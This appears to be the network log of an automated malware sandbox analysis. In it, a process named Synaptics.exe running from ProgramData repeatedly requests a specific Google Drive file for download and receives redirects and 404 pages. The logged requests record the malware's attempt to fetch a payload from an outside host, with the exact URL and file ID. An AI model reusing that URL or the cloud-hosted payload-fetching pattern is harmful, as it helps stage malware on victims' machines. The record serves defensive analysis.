                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.449794142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:10 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:10 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-FuhdvGe0JLI_UH8m7cWGFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.449798142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:11 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:11 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC50-n487laNT3KrdLTPIztcoLrostzIEegM5wPhWE19vQNvhxeqhtBeInlCNCbHZN1Tt6iTWZM
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-L8JX47pLW7R0LtTrck0MJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:11 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:11 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 79 37 55 75 49 6b 56 6d 38 30 46 45 73 65 32 68 6c 62 74 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="9y7UuIkVm80FEse2hlbt7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:11 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.449797142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:11 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--7-7FSE-kqxGgpZQym2aBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.449796142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:11 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:12 UTC1242INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC5_y5i5lPG1aOU0wiSsmWvShEiePlX4Wq_JkeuenR_XUQFF71Q7pFvhGwzlkALeXS4
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UPJnxdT4DZyMgBNz0GjmxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:12 UTC148INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                                                              2024-12-30 10:48:12 UTC1390INData Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 49 45 71 49 44 37 4f 58 37 44 4f 68 61 61 71 77 53 66 73 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a
                                                                                                                              Data Ascii: Found)!!1</title><style nonce="9IEqID7OX7DOhaaqwSfsUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                                                              2024-12-30 10:48:12 UTC114INData Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.449799142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:11 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                                                                                                                              2024-12-30 10:48:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:11 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-oYZtT7qjUKc-NmAyRPZTnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.449802142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                                                                                                                              2024-12-30 10:48:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-foxI65YjR_h_vDH8I9aquw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.449803142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:12 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7Lh5v-0MuWHyOw_TefEFExUc9wNyGvQC_tHF4tjRjtxGO0ciRpHEcDOQi8AVu989rt
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:12 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Qm8X_qKrbQqimXO87psscA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:12 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:12 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 48 70 79 38 30 4c 70 45 47 7a 55 61 69 4c 74 67 33 4b 47 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="nHpy80LpEGzUaiLtg3KGtQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:12 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.449804142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                                                                                                                              2024-12-30 10:48:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:12 GMT
